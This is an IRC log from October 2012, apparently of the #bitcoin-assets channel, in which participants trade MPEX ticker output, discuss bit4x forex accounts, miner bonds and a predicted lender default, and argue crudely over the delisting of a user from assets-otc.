discuss mpex on btctalk anymore.. there's always somebody who says it's child porn site Oct 20 22:10:06 dude btctalk is fucking annoying Oct 20 22:10:15 there is no child porn on that site Oct 20 22:10:24 just a /b/ like board where girls post nudie pics Oct 20 22:10:27 which isn't even really porn Oct 20 22:10:30 bageezus Oct 20 22:10:41 no one complains about fucking reddit.com/r/gonewild Oct 20 22:11:28 i know. but btctalk is practically lost cause now. Oct 20 22:11:50 le sigh Oct 20 22:11:52 too many trolls Oct 20 22:12:03 everything encounters the eternal september it seems Oct 20 22:12:14 #bitcoin-assets is the last bastion of hope Oct 20 22:12:30 [MPEX] [S.MPOE] 10800 @ 0.00043192 = 4.6647 BTC [+] Oct 20 22:12:31 [MPEX] [S.MPOE] 11882 @ 0.00043376 = 5.1539 BTC [+] Oct 20 22:12:33 [MPEX] [S.MPOE] 6118 @ 0.00043403 = 2.6554 BTC [+] Oct 20 22:12:52 jurov: mircea_popescu loved the live ticker Oct 20 22:13:12 yes, he helped me a bit with it Oct 20 22:14:31 well jurov I may end up using coinbr extensively if this service takes off to hedge fees Oct 20 22:14:41 from moneygram buttfucking me on the price Oct 20 22:23:16 thx, i just got idea that kakobrekla's clients may need to hedge BTCUSD too Oct 20 22:23:30 we'll se when he's around Oct 20 22:38:27 [MPEX] [S.MPOE] 16006 @ 0.00043403 = 6.9471 BTC [+] Oct 20 23:04:50 [MPEX] [S.MPOE] 1900 @ 0.00043154 = 0.8199 BTC [-] Oct 20 23:04:52 [MPEX] [S.MPOE] 20200 @ 0.00043059 = 8.6979 BTC [-] Oct 20 23:30:06 [MPEX] [S.MPOE] 14000 @ 0.00043059 = 6.0283 BTC [-] Oct 20 23:55:16 [MPEX] [S.MPOE] 21376 @ 0.00043403 = 9.2778 BTC [+] Oct 20 23:55:17 [MPEX] [S.MPOE] 2924 @ 0.00043464 = 1.2709 BTC [+] Oct 21 00:12:26 ;;ticker Oct 21 00:12:27 Best bid: 11.67752, Best ask: 11.67753, Bid-ask spread: 0.00001, Last trade: 11.67752, 24 hour volume: 22623, 24 hour low: 11.56025, 24 hour high: 11.85 Oct 21 00:14:27 mornin kakobrekla Oct 21 00:14:36 heya jurov Oct 21 00:14:38 hows it going Oct 21 00:14:43 slowly Oct 21 00:14:52 better slowly than backwards Oct 21 00:15:18 hehe... don't bit4x client need some btc/usd hedging? Oct 21 00:15:40 hm? Oct 21 00:16:08 can you rephrase the question Oct 21 00:16:23 like, i'm going to trade forex, fund my account in btc and then have second thoughts Oct 21 00:16:44 yea? Oct 21 00:16:52 what if btc is going up and i'll be stuck at usd... Oct 21 00:16:57 eh? Oct 21 00:17:00 there is no usd Oct 21 00:17:11 your MT4 balance is denominated in btc Oct 21 00:17:15 there is no conversion Oct 21 00:17:45 thats the point of the whole thing Oct 21 00:17:53 :) Oct 21 00:17:56 but what happens if btc shoots up? you eat the loss? Oct 21 00:18:09 we never convert the btc Oct 21 00:19:10 all deposits that clients made are in my cold storage Oct 21 00:20:55 [MPEX] [S.MPOE] 30514 @ 0.00043464 = 13.2626 BTC [+] Oct 21 00:21:13 but if someone funds with btc and want to trade trades eur/usd, and later wants to cash out in bitcoins, you use current exch rate, no? Oct 21 00:21:31 good question Oct 21 00:21:36 ive been wondering a similar quetion Oct 21 00:21:44 then they have to take bitcoin movement into account Oct 21 00:22:09 you can only cash out in bitcoins Oct 21 00:22:13 its not an option. Oct 21 00:22:19 everything is in bitcoins Oct 21 00:22:24 you dodge my question Oct 21 00:22:26 your deposit, your mt4 balance, your PL Oct 21 00:22:31 your withdrawal Oct 21 00:22:32 no Oct 21 00:22:44 so it's practically btc.usd forex? Oct 21 00:22:46 you keep asking me about usd/btc Oct 21 00:22:57 as site says its irrelevant as per your trading Oct 21 00:24:15 so i deposit, say, 100BTC. now, can i use them for usd/eur/gold forex trades, no? Oct 21 00:25:11 jurov yes Oct 21 00:25:53 for comodities 0.1 lot is minimum, meaning with 100 btc you need 1:100 leverage Oct 21 00:26:01 which is kinda dangerous Oct 21 00:26:05 for G/S Oct 21 00:26:27 for the rest of the stuff 0.01 is min, so 100 btc with 1:10 will do Oct 21 00:27:09 check margin and leverage here http://bit4x.com/faq.html Oct 21 00:34:06 dunno, perhaps i'll have to try it myself to understand why btc/usd is irrelevant at bit4x Oct 21 00:36:15 sure Oct 21 00:36:35 you can try the demo, its eur only Oct 21 00:36:43 just imagine eur is btc on the exchange Oct 21 00:36:53 and thats about it. Oct 21 00:46:21 [MPEX] [S.MPOE] 11246 @ 0.00043464 = 4.888 BTC [+] Oct 21 01:11:37 [MPEX] [S.MPOE] 3916 @ 0.00043464 = 1.7021 BTC [+] Oct 21 01:11:38 [MPEX] [S.MPOE] 11100 @ 0.00043486 = 4.8269 BTC [+] Oct 21 01:11:39 [MPEX] [S.MPOE] 17284 @ 0.00043494 = 7.5175 BTC [+] Oct 21 01:36:47 [MPEX] [S.MPOE] 9759 @ 0.00043059 = 4.2021 BTC [-] Oct 21 01:36:49 [MPEX] [S.MPOE] 30014 @ 0.00043045 = 12.9195 BTC [-] Oct 21 01:57:58 mmm the mrs brought me back a 21 y/o Oct 21 01:59:58 hm? Oct 21 02:02:06 [MPEX] [S.MPOE] 1845 @ 0.00043045 = 0.7942 BTC [-] Oct 21 02:03:12 http://www.masterofmalt.com/whiskies/balvenie-port-wood-21-year-old-whisky/ **** BEGIN LOGGING AT Sun Oct 21 06:53:40 2012 Oct 21 07:07:28 just trading on price swaps i guess youd call it Oct 21 07:07:47 Well that'd be mostly what I was doing then. Oct 21 07:08:09 And the movements were quite extreme, it was ridiculous Oct 21 07:08:55 [MPEX] [S.MPOE] 22500 @ 0.00042928 = 9.6588 BTC [-] Oct 21 07:09:11 but you have access to moning revenue Oct 21 07:09:13 thats gold Oct 21 07:09:15 lol Oct 21 07:09:32 glbse had massive spreads Oct 21 07:09:47 was nice trading that Oct 21 07:10:00 Only because I put a lot of money upfront to start trading. Oct 21 07:10:18 More than I could actively trade, so most had to be left in some asset or another. Oct 21 07:10:41 It then allowed me to have a lot of lowball bids everywhere. Oct 21 07:10:53 And people would always eventually sell into it. Oct 21 07:11:19 Sometimes as low as 5%-30% of the asset's average value. Oct 21 07:14:04 Hey, I'm calculating what I earned and it comes near 7% per week on average. Oct 21 07:14:34 and I had no funds in Pirate. Oct 21 07:14:45 lol Oct 21 07:14:56 good for you. 0 pirate exposure Oct 21 07:15:51 It's actually quite crazy. Oct 21 07:16:18 All due to a few purchases under 10% of the asset's value. Oct 21 07:16:30 miners are the only secure form of returns imo Oct 21 07:16:35 Sometimes even under or near the next dividend's value. Oct 21 07:17:12 Eh, tell that to those who bought fixed hashing bonds... Oct 21 07:17:20 They didn't rally make a profit. Oct 21 07:18:39 miners are only secure in the sense that you're secure in the knowledge your investment will eventually devalue to almost 0. Oct 21 07:20:17 transaction fees will cover it Oct 21 07:21:08 its a commodified market in it man. Oct 21 07:21:22 at some point 0 btc transactions will take days to clear no? Oct 21 07:21:27 you'll have to double power every 18 months just to stay the same, and this AFTER it stops growing. Oct 21 07:21:34 0 btc miner fee Oct 21 07:21:46 yes, but 0.000001 isn't much. Oct 21 07:22:14 it'll be fine Oct 21 07:22:24 if you have hardware couldnt you liquidate your equipment over time to somewhat cover the cost of keeping up with moores law... Oct 21 07:22:27 ?* Oct 21 07:22:51 people playing satoshi dice will keep wasting time with the various faucets, and eating transaction fees to pay the miners for their electricity Oct 21 07:23:15 ;;bc,diff Oct 21 07:23:16 3072321.7320208 Oct 21 07:23:19 [00:22:13_UTC-0400] it'll be fine Oct 21 07:23:29 it'll be infinite. Oct 21 07:24:28 so its not profitable to mine? Oct 21 07:25:06 or is it just your profit decreases to 0 over time Oct 21 07:26:43 thestringpuller it's a cash-flow business. let me dig the thing up Oct 21 07:26:58 .g site:bitcointalk.org miner bonds worst investments you can make Oct 21 07:27:42 ugh Oct 21 07:28:06 https://bitcointalk.org/index.php?topic=100303.0 Oct 21 07:28:07 there Oct 21 07:29:40 :( Oct 21 07:30:13 i see Oct 21 07:30:44 mircea_popescu what about loans? Oct 21 07:30:59 what about them ? Oct 21 07:31:33 are they more viable on the scale of "bad to good" Oct 21 07:34:23 [MPEX] [S.MPOE] 7503 @ 0.00042928 = 3.2209 BTC [-] Oct 21 07:34:25 [MPEX] [S.MPOE] 10800 @ 0.00042927 = 4.6361 BTC [-] Oct 21 07:34:25 [MPEX] [S.MPOE] 13097 @ 0.00042926 = 5.622 BTC [-] Oct 21 07:36:03 Mining is profitable... just not for fixed mhash/s bond because of what's stated in the thread. Oct 21 07:36:12 lol Oct 21 07:36:18 thestringpuller the last play-pretend forum banker defaulted recently, didn't he ? Oct 21 07:36:31 loans work, but 5% a week bullshit is not "loans". Oct 21 07:36:38 which one is that? Oct 21 07:36:42 harnett Oct 21 07:36:52 Did he? Oct 21 07:37:00 patrick harnett makes profits off loans non? Oct 21 07:37:24 oh patrick defaulted? Oct 21 07:37:30 whoa Oct 21 07:38:20 i'm sure he has a great plan to make everything right over the span of a few years Oct 21 07:38:34 i'm also sure he's going to spend most of those years in various courts. Oct 21 07:39:13 well fuck Oct 21 07:39:40 i guess usagi had no chance then Oct 21 07:40:33 it doesn't work in the real world, either. if you compensate for bad loans by jacking up rates eventually you create a vicious circle : Oct 21 07:40:50 the only people willing to borrow are those who don't intend to repay. Oct 21 07:41:37 When did Patrick default? Oct 21 07:41:53 man the economy is gonna plummet Oct 21 07:41:59 shit dizzle Oct 21 07:42:01 BTC-Mining it's a future event. ten days or so. Oct 21 07:43:00 aye, so where can I read about that? Do you remember the thread? Oct 21 07:43:12 you will, once he fails to pay my 500 btc end of the month Oct 21 07:44:10 so... how do you know if there's no announcement or anything? Oct 21 07:44:38 aren't you used to me by now ? i know things. Oct 21 07:45:03 oh... I see... Oct 21 07:45:36 Not sure why you would think so for Harnett Oct 21 07:50:54 Well, we'll see about that very soon. Oct 21 07:51:00 yeah. Oct 21 07:52:45 It's now the wee hours of the morning. I'm off for today. Oct 21 07:52:49 Goodbye Oct 21 08:00:04 [MPEX] [S.MPOE] 5907 @ 0.00042926 = 2.5356 BTC [-] Oct 21 08:00:05 [MPEX] [S.MPOE] 18793 @ 0.00042921 = 8.0661 BTC [-] Oct 21 08:00:16 ;;getrating ognasty Oct 21 08:00:17 WARNING: Currently not authenticated. User OgNasty, rated since Sat Sep 1 19:15:19 2012. Cumulative rating 11, from 8 total ratings. Received ratings: 8 positive, 0 negative. Sent ratings: 14 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=OgNasty Oct 21 08:05:03 mircea_popescu: is part of the btc banking illuminati Oct 21 08:25:56 [MPEX] [S.MPOE] 45100 @ 0.0004295 = 19.3705 BTC [+] Oct 21 08:25:58 [MPEX] [S.MPOE] 12952 @ 0.00042921 = 5.5591 BTC [-] Oct 21 08:52:03 [MPEX] [S.MPOE] 25255 @ 0.00042921 = 10.8397 BTC [-] Oct 21 08:52:05 [MPEX] [S.MPOE] 6245 @ 0.00042908 = 2.6796 BTC [-] Oct 21 09:10:01 mircea_popescu why would you loan him 500btc if hes a "fake banker" Oct 21 09:18:20 [MPEX] [S.MPOE] 23555 @ 0.00042908 = 10.107 BTC [-] Oct 21 09:18:22 [MPEX] [S.MPOE] 14700 @ 0.00042898 = 6.306 BTC [-] Oct 21 09:18:23 [MPEX] [S.MPOE] 12745 @ 0.00042883 = 5.4654 BTC [-] Oct 21 09:25:24 noagendamarket do you think harnett is defaulting Oct 21 09:25:26 ?* Oct 21 09:25:31 I'm checking the forums. Oct 21 09:27:54 inb4 "I waz hacked" Oct 21 09:30:32 I really dont know. Nothing surprises me anymore wrt bitcoin bankers Oct 21 09:32:40 i only really trust my mpex account Oct 21 09:32:50 it's the only thing that consistently makes me money Oct 21 09:44:01 [MPEX] [S.MPOE] 7214 @ 0.00042883 = 3.0936 BTC [-] Oct 21 09:44:02 [MPEX] [S.MPOE] 11995 @ 0.00042868 = 5.142 BTC [-] Oct 21 10:10:11 [MPEX] [S.MPOE] 10356 @ 0.00042868 = 4.4394 BTC [-] Oct 21 10:10:13 [MPEX] [S.MPOE] 16939 @ 0.00042863 = 7.2606 BTC [-] Oct 21 10:16:37 bad trust criterion i think Oct 21 10:19:55 mircea_popescu: I think it's kind of shitty to claim that harnett defaulted, and then to revise the claim to say you think he will Oct 21 10:20:01 sounds a bit like FUD Oct 21 10:35:28 [MPEX] [S.MPOE] 20900 @ 0.00042863 = 8.9584 BTC [-] Oct 21 11:00:54 [MPEX] [S.MPOE] 2461 @ 0.00042863 = 1.0549 BTC [-] Oct 21 11:26:50 [MPEX] [S.MPOE] 14500 @ 0.00042843 = 6.2122 BTC [-] Oct 21 11:52:05 [MPEX] [S.MPOE] 9666 @ 0.00042843 = 4.1412 BTC [-] Oct 21 12:13:43 copumpkin what's your definition of default ? Oct 21 12:14:13 i didn't revise the claim. what i pointed out was that third parties will be able to verify this at a set point in the future. Oct 21 12:18:50 [MPEX] [S.MPOE] 41763 @ 0.00042855 = 17.8975 BTC [+] Oct 21 12:18:52 [MPEX] [S.MPOE] 4937 @ 0.00042879 = 2.1169 BTC [+] Oct 21 12:45:19 [MPEX] [S.MPOE] 5500 @ 0.00042843 = 2.3564 BTC [-] Oct 21 12:48:26 what? Another drama in the happy-happy-joy-joy bitcoin land? Oct 21 12:51:21 this seen is worst than the Mexican soap opera Oct 21 13:11:25 [MPEX] [S.MPOE] 2563 @ 0.00042879 = 1.099 BTC [+] Oct 21 13:11:27 [MPEX] [S.MPOE] 36921 @ 0.00042995 = 15.8742 BTC [+] Oct 21 13:11:28 [MPEX] [S.MPOE] 3163 @ 0.00043439 = 1.374 BTC [+] Oct 21 13:11:29 [MPEX] [S.MPOE] 6962 @ 0.00043494 = 3.0281 BTC [+] Oct 21 13:37:18 [MPEX] [S.MPOE] 8034 @ 0.00042843 = 3.442 BTC [-] Oct 21 13:37:20 [MPEX] [S.MPOE] 32400 @ 0.00042841 = 13.8805 BTC [-] Oct 21 13:37:21 [MPEX] [S.MPOE] 15125 @ 0.00042837 = 6.4791 BTC [-] Oct 21 13:49:06 what is going on? Oct 21 13:49:21 more drama? Oct 21 13:54:46 mornin Oct 21 13:54:54 soh, gpumax finally closing Oct 21 13:55:38 gpumax was spamming for news sign-up's not too long ago Oct 21 13:57:13 Chaang-Noi: how's your ninja team doing? Any progress? When can we see bleading and toothless Trendon begging for mercy and transferring all the stolen coins back? Oct 21 13:57:48 when pirate did that wait til the 12th thing most people quit on me Oct 21 13:57:54 then SEC came in... Oct 21 13:58:05 i had to operate on my own for the share holders Oct 21 13:58:10 i send a lawyer to collect assets Oct 21 13:58:25 but then GLBSE fail... Oct 21 13:58:25 did the SEC really show up? Oct 21 13:58:34 SEC is doing a real investigation Oct 21 13:58:40 into what exactly i dont know Oct 21 13:58:44 so... Oct 21 13:58:52 did you see the papers from SEC? Oct 21 13:58:56 anyway the other people are now ready to sue pirate... Oct 21 13:59:06 i did not see any papers from the SEC Oct 21 13:59:13 i have trusted friends who called the SEC Oct 21 13:59:29 seems the SEC wants to chat with me Oct 21 13:59:45 ask for a request on a paper Oct 21 13:59:54 and post the scan Oct 21 14:00:06 im going to wait for them to contact me directly Oct 21 14:00:13 then i will direct them to my lawyer Oct 21 14:00:38 Chaang-Noi: yeah, I dont like whats going on here Oct 21 14:00:48 chats are bull shit and if they start twisting your arm, you have nothing to prove it. Chat ONLY via letters and publish every one of them Oct 21 14:01:07 they want me to call them and they tape my phone call, not going to happen Oct 21 14:01:07 [MPEX] [O.BTCUSD.P120T] 10 @ 0.09413432 = 0.9413 BTC [-] Oct 21 14:01:11 esp if they wont tell me what they want Oct 21 14:01:32 unless they show you a court order (publish it) that prohibits the publication of documents Oct 21 14:01:46 let them send you a letter with what they want Oct 21 14:02:19 yeah im not doing shit until they contact me Oct 21 14:03:13 remember court order or they can go and fuck themselves Oct 21 14:03:49 especially if they ask for third party documents or what not Oct 21 14:04:12 they will have to ship me over from thailand Oct 21 14:04:34 i kinda doubt they will anyway Oct 21 14:04:37 aren't you on a "wanted" list in US? Oct 21 14:04:44 unless pirate was doing some terrorist like shit Oct 21 14:04:49 not on The list :) Oct 21 14:04:53 but list never the less Oct 21 14:05:03 lol what list? Oct 21 14:05:55 I was reading somewhere that you are not really comfortable in US because of some old shit Oct 21 14:06:02 ? Oct 21 14:06:09 i was just in the usa Oct 21 14:06:11 :) Oct 21 14:06:21 yeah, something about you escaping to Thailand etc Oct 21 14:06:31 with pirate, i posted the photos lol Oct 21 14:06:38 I know Oct 21 14:06:46 was this something i wrote or someone else? Oct 21 14:06:48 that's why it sounded a bit strange Oct 21 14:07:15 huh... I can not remember that Oct 21 14:07:55 lets talk more serious stuff. Oct 21 14:08:26 the assets-otc happening that's paling in the theater near you :) Oct 21 14:10:04 i need to rise the coin to get this project off the ground but if assets-otc has problems (personal) I am not aware of, then this is kinda bad :( Oct 21 14:10:35 Chaang-Noi: or are you guys just "in love" like me and usagi? LOL :) Oct 21 14:11:09 poatir guy? Oct 21 14:11:12 yes Oct 21 14:11:21 piotr_n guy Oct 21 14:11:31 he just trolled my threads hard with crazy stuff like theymos and nefario were defruading my investors with me Oct 21 14:11:43 i just trolled his thread to show people how crazy he was Oct 21 14:11:49 OK, that episode Oct 21 14:11:51 he is unstable. Oct 21 14:12:03 so it's just a trolling festival? Oct 21 14:12:03 i was doing everyone a favor Oct 21 14:12:10 i ws just fucking with him Oct 21 14:12:11 Unstable? how unstable? Like usagi? Oct 21 14:12:23 cuz he went into every thread i had and made shit up Oct 21 14:12:46 he thinks theymos and neferio are working with me to sell fake stocks on glbse Oct 21 14:12:49 and otehr crazy shit Oct 21 14:13:05 and he kicked you out at the drop of a hat for no reason Oct 21 14:13:07 yeah, i did read some. Oct 21 14:13:21 me? Oct 21 14:13:37 from where? Oct 21 14:14:02 TROLLS, TROLLS EVERYWHERE Oct 21 14:14:07 https://bitcointalk.org/index.php?topic=105437.msg1287486#msg1287486 Oct 21 14:14:11 did yo uknow about this? Oct 21 14:14:33 wat Oct 21 14:14:37 wtf is assets otc Oct 21 14:14:47 wtf? Oct 21 14:14:58 "you asset" Oct 21 14:14:59 i did not know that... shit. this guy is unstable Oct 21 14:15:08 HEY ESKIMO Oct 21 14:15:10 YOU ASSET Oct 21 14:15:24 yeah he is unstable he is a nutter Oct 21 14:15:44 hm Oct 21 14:16:00 EskimoBob why? Oct 21 14:16:05 no idea why Oct 21 14:16:16 I was actually in his side and not goats Oct 21 14:16:35 well that sucks balls. Oct 21 14:16:48 I guess he did not like my comment about the drama Oct 21 14:17:18 urlpls Oct 21 14:17:36 fuck, this is really strange because I was promoting hes service, not getting in the middle of goats and piotrs fight and actually asking them to chill out Oct 21 14:17:56 he is crazy Oct 21 14:18:16 i was just trolling him cuz i knew he would act liek this Oct 21 14:18:21 you should not trust him Oct 21 14:18:25 https://bitcointalk.org/index.php?topic=105437.msg1285560#msg1285560 maybe this one? Oct 21 14:19:15 thanx man, I this piotr guy can go and fuck himself unless he apologises in that same forum thread Oct 21 14:23:00 ha ha Oct 21 14:23:04 EskimoBob got nefarioed. Oct 21 14:23:31 lol Oct 21 14:23:45 nefarioed :) Oct 21 14:24:12 you can tell him i was just fucking with him if you want :) Oct 21 14:24:22 bad goat, no fucking with people Oct 21 14:24:25 where is nefario? Oct 21 14:24:31 leotreasure: hiding with kim dotcom Oct 21 14:25:17 meh, that guy had it coming Oct 21 14:25:32 see Oct 21 14:25:37 this is why I have not given much in the way of fucks over dmc Oct 21 14:25:42 the entire community is full of assholes Oct 21 14:28:01 i know a few that are not Oct 21 14:28:06 [MPEX] [S.MPOE] 32200 @ 0.00043344 = 13.9568 BTC [+] Oct 21 14:28:07 its rare Oct 21 14:28:07 [MPEX] [S.MPOE] 4065 @ 0.00043494 = 1.768 BTC [+] Oct 21 14:28:08 [MPEX] [S.MPOE] 1200 @ 0.00043515 = 0.5222 BTC [+] Oct 21 14:28:09 [MPEX] [S.MPOE] 7100 @ 0.00043537 = 3.0911 BTC [+] Oct 21 14:28:10 [MPEX] [S.MPOE] 6035 @ 0.00043551 = 2.6283 BTC [+] Oct 21 14:29:40 ;;getrating piotr_n Oct 21 14:29:40 This user has not yet been rated. WARNING: Currently not authenticated. Oct 21 14:29:55 does he have otc ? Oct 21 14:29:59 ;;getrating piotr_n Oct 21 14:30:00 This user has not yet been rated. WARNING: Currently not authenticated. Oct 21 14:30:12 he is under different name Oct 21 14:30:20 tonikt Oct 21 14:30:26 ;;getrating tonikt Oct 21 14:30:27 Currently authenticated from hostmask tonikt!~tonikt@unaffiliated/tonikt . User tonikt, rated since Mon Jul 9 09:55:31 2012. Cumulative rating 6, from 5 total ratings. Received ratings: 5 positive, 0 negative. Sent ratings: 7 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=tonikt Oct 21 14:30:36 jeez Oct 21 14:30:41 even i made txes with him. Oct 21 14:31:17 kakobrekla: do you have something against me? Oct 21 14:31:20 I am truly surprised that he acted like this with out any reason Oct 21 14:31:31 well im not particuraly fond of this semi random kicking out Oct 21 14:31:36 tonikt: wtf was that all about? Oct 21 14:31:54 do you understand that I was on your side? Oct 21 14:32:09 and well tbh, "If they are licking your balls, or compromising my reputation - yes!" Oct 21 14:32:19 i was checking the reputation being compromised Oct 21 14:32:19 im not, i knew he was crazy Oct 21 14:32:40 so you think goat, nefario an theymos are honest people? Oct 21 14:32:47 me? Oct 21 14:32:49 hell no Oct 21 14:33:04 theymos and neff are as bad as this trendon fuck Oct 21 14:33:05 I'm asking kakobrekla Oct 21 14:33:12 asking what Oct 21 14:33:13 With you EskimoBob, I'm done Oct 21 14:33:14 i told you Oct 21 14:33:14 goat is just strange :) honestly Oct 21 14:33:18 oh Oct 21 14:33:24 you mean about goat nef and theymos Oct 21 14:33:26 shady people Oct 21 14:33:33 goat is maybe just silly Oct 21 14:33:36 tonikt: what did I do? Oct 21 14:33:44 kakobrekla: Would you let them into your service? Oct 21 14:33:47 For free.. Oct 21 14:33:51 sure Oct 21 14:34:00 Why? Oct 21 14:34:00 yeah im silly Oct 21 14:34:03 I am honestly surprised that you acted like that tonikt Oct 21 14:34:09 and yeah i can be a giant asshole at times :) Oct 21 14:34:27 i run bit4x and smpake, why would i disallow them to use it - i have no reason to Oct 21 14:34:29 and also Oct 21 14:34:38 what does EB have to do with it Oct 21 14:34:45 anyway guys, ill be back alter, time for a massage :) Oct 21 14:34:47 he is not theymos or goat Oct 21 14:34:49 or nefario Oct 21 14:35:19 i have promoted your service in almost every message lately and inviting pople over and now this Oct 21 14:35:25 people* Oct 21 14:35:30 you are acting imature tonikt Oct 21 14:35:45 for no reason at all! Oct 21 14:35:47 :) Oct 21 14:36:16 I'm just taking good care of the reputation of assets-otc Oct 21 14:36:23 for all i care pirate can open a forex account with me Oct 21 14:36:28 You don't like it - I dont care Oct 21 14:36:43 tonikt: you have no assets in otc any more Oct 21 14:36:45 whole community dont like -you dont care Oct 21 14:36:48 nobody will use you Oct 21 14:36:59 We will see Oct 21 14:37:03 running service like that you can not be such a drama queen and a fkn flip-flop Oct 21 14:37:10 indeed Oct 21 14:37:44 anyone can piss you off just by spelling your name wrong tonikt. Oct 21 14:37:48 lol Oct 21 14:38:11 EskimoBob: you were offending me back then, when I was saying that Goat and Nefario were crooks Oct 21 14:38:13 I am glad it happened so early and not on later time. Oct 21 14:38:18 Then I turned out be be right... Oct 21 14:38:28 lol Oct 21 14:38:30 You came asking me, aprologizing, if you can use my service Oct 21 14:38:31 back when? Oct 21 14:38:40 I let you in - but you did not learn the lesson Oct 21 14:38:47 And you have kept offending me Oct 21 14:38:57 tonikt where does he offend you? Oct 21 14:39:01 So, thats why I'm done with you Oct 21 14:39:03 urlpls Oct 21 14:39:11 have I ? url please Oct 21 14:39:17 kakobrekla: are you his lawyer? Oct 21 14:39:41 yeah and he is paying reall well Oct 21 14:39:55 now url? Oct 21 14:40:05 https://bitcointalk.org/index.php?topic=105437.msg1287459#msg1287459 ? Oct 21 14:40:25 Quite: "Chaang Noi, thank you for the warning. Good news is that assetc-otc owner has no access to issuers nor investors coin." Oct 21 14:40:38 Thats an offense for me Oct 21 14:40:39 " I had my share of word fights with piotr_n not too long ago but it's water under the bridge and all have moved on. Oct 21 14:40:41 The asstes-otc ideas has potential (if it gets a "trading" interface" Oct 21 14:40:50 lol Oct 21 14:40:54 this is hilarious Oct 21 14:41:44 soap opera ;] Oct 21 14:42:10 tonikt dude, you obviously have some serious issues. Sorry, I can not deal with someone as unstable as you and I can not recommend your services to anyone from now on Oct 21 14:42:28 fuck me... this is worst than soap opera... LOL Oct 21 14:42:35 I agree - I don't take it seriously, you do all the drama and I just do "update assets set delisted=1 where id=2" - and then just laugh... :) Oct 21 14:42:51 like damn emo-girls on their fkn periods Oct 21 14:43:19 you mean like usagi? Oct 21 14:43:19 I know EskimoBob that you cannot deal with me - and that is because I will not allow you to deal with me amnymore Oct 21 14:43:29 But, please keep dealing with Goat Oct 21 14:43:29 tonikt: you just demonstrated how fucked up up actually are :) Oct 21 14:43:32 He is your hero :) Oct 21 14:43:43 trololololololo Oct 21 14:43:51 EskimoBob: "fucked up" is quite a relative term :) Oct 21 14:43:58 he is not my fkn here you fool Oct 21 14:44:04 ... so I'm tending to agree on it.. :) Oct 21 14:44:13 SUPERGOAT TO THE RESCUE! FORM OF A BONG! Oct 21 14:45:01 Oh, I think he is... Oct 21 14:45:17 Don't deny your feelings Oct 21 14:45:24 just fuck off now tonikt, you need to grow up Oct 21 14:45:30 :) Oct 21 14:45:56 hey, you came to me - remember? Oct 21 14:46:24 you appologized for being a dick to me in a past Oct 21 14:46:39 and then you asked if you can get your shit listed at assets-otc Oct 21 14:46:52 and then i let you in Oct 21 14:46:57 yes Oct 21 14:46:59 and then you showed me your disrespect Oct 21 14:47:03 and then I delisted you Oct 21 14:47:08 and now you think that I have insulted you somehow? Oct 21 14:47:27 and now you tell me: fuck off Oct 21 14:47:27 quickly tonikt, write an EskimoBob x goat fanfic Oct 21 14:47:27 post it to the forums for great victory Oct 21 14:47:34 tonikt: respect is earned Oct 21 14:47:37 so, I would not be so sure that I am a one who needs to grow up Oct 21 14:47:49 and you just pissed it all away tonikt Oct 21 14:48:00 man, whats with all this commentary about needing to grow up Oct 21 14:48:03 only kids say that Oct 21 14:48:19 you delisted it with no reason. Oct 21 14:48:37 There was a reason Oct 21 14:48:42 what is that? Oct 21 14:48:43 A gave you a chance - and you blew it Oct 21 14:48:49 That's it Oct 21 14:49:10 i blew nothing :) you flipped out over nothing and acted like a asshat Oct 21 14:49:22 your loss tonikt Oct 21 14:50:17 Sure, my loss... what am I going to do now? :) Oct 21 14:50:46 I hope you guys understand that I do this project more as a hobby Oct 21 14:51:10 So there is no way that I am going to let anyone using my work for free while disrespectful to me at the same time Oct 21 14:53:02 LOL, I was one of the few guys actually on your side Oct 21 14:53:30 13:50.45 ( tonikt ) I hope you guys understand that I do this project more as a hobby Oct 21 14:53:45 enough said Oct 21 14:53:47 meaning what exactly, with nefario those words ment he doenst give much fuck Oct 21 14:54:28 i dont think other peoples money + hobby doesnt go well together Oct 21 14:54:39 [MPEX] [S.MPOE] 400 @ 0.00043247 = 0.173 BTC [-] Oct 21 14:54:41 [MPEX] [S.MPOE] 1981 @ 0.00043052 = 0.8529 BTC [-] Oct 21 14:54:57 kakobrekla: do you have an idea what assets-otc is about? Oct 21 14:55:13 it's not an exchange like glbse was Oct 21 14:55:19 I dont touch any money Oct 21 14:55:24 well, if it was anything like bitcoin-otc there wouldnt have bans like that Oct 21 14:55:38 have been* Oct 21 14:55:39 but there are no bans Oct 21 14:55:55 EskimoBob can still log in and owe assets at the service Oct 21 14:56:03 he is just not allowed to be an asset issuer Oct 21 14:56:16 tonikt: dream on Oct 21 14:56:18 because I need to take care of the reputation of this service Oct 21 14:56:25 lol Oct 21 14:56:35 nanotube rep doenst go down if 10 scammers join otc Oct 21 14:56:52 absurd BS tonikt. Oct 21 14:57:15 you pissed on your "reputation" (that was low anyways) buy showing how unstable you can be Oct 21 14:57:30 kakobrekla: but nanotube does not hold onyone's bitcoins? Oct 21 14:57:40 while the asset issuers in my doervice do Oct 21 14:57:48 service* Oct 21 14:57:51 sorry man, I was really trying to promote your service. Oct 21 14:58:11 So I will go my best to protect the users from dishonest asset issuers Oct 21 14:58:14 egos collide. Oct 21 14:58:14 tonikt: so do not you hold any coin Oct 21 14:58:38 seriosusly girls, get your shit together. Oct 21 14:59:02 kakobrekla: well, it isnt me who has been crying here Oct 21 14:59:08 forget it, I am not going to waste my time on this egomaniac Oct 21 14:59:13 if any of us - it would rather be you :) Oct 21 14:59:42 tonikt: I d di not cry. I was just surprised what you did and your reason for this is ... how to put it .... Oct 21 15:00:09 And you are still surprised, despite my explanations Oct 21 15:00:15 And you are still crying Oct 21 15:00:22 Along with kakobrekla Oct 21 15:00:36 What can I tell you guys: my server - my rules Oct 21 15:00:43 tonikt now you are starting to insult me. :) Oct 21 15:00:55 kakobrekla: you started first Oct 21 15:01:08 I came here because you mentioned myh name in a negative contect Oct 21 15:01:37 Let me quote: jeez. even i made txes with him. Oct 21 15:02:12 So it seem like now you regret making txes with me back then Oct 21 15:02:23 lolwhat Oct 21 15:02:27 Well, it that makes you feel better: I regret it too :P Oct 21 15:02:31 how does this make sense Oct 21 15:02:45 Well you tell me - these are your words Oct 21 15:03:00 Maybe we understand English differently Oct 21 15:03:25 yeah, i was wondering what otc ratings were behind the words "If they are licking your balls, or compromising my reputation - yes!" Oct 21 15:03:33 But your expression about making txes with me in the past came out as quite regretful Oct 21 15:03:52 to see what is there to destroy Oct 21 15:03:52 and i saw even i was a part of it Oct 21 15:03:52 thats about it Oct 21 15:04:15 kakobrekla: but you know that the person who I 